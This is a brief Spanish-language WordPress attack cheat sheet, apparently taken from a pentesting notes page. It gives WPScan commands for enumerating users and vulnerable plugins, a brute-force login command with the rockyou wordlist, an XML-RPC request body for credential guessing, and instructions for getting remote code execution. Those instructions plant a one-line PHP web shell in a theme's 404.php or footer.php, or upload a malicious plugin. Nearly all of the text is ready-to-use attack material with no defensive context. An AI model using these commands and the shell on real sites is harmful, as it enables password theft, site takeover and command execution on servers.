WordPress Hacking
Enumeración (WPScan)
# Usuarios, Plugins y Temas vulnerables
wpscan --url http://target.com -e u,vp,vt --api-token <TOKEN>
Fuerza Bruta
Login:
wpscan --url http://target.com -U admin -P rockyou.txt
XML-RPC (Más rápido):
Si xmlrpc.php está habilitado.
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass123</value></param>
</params>
</methodCall>
RCE: Subir Shell
- Theme Editor: Appearance > Theme Editor. Edita
404.phpofooter.php.<?php system($_GET['cmd']); ?> - Plugin Malicioso: Sube un
.zipcon la shell dentro.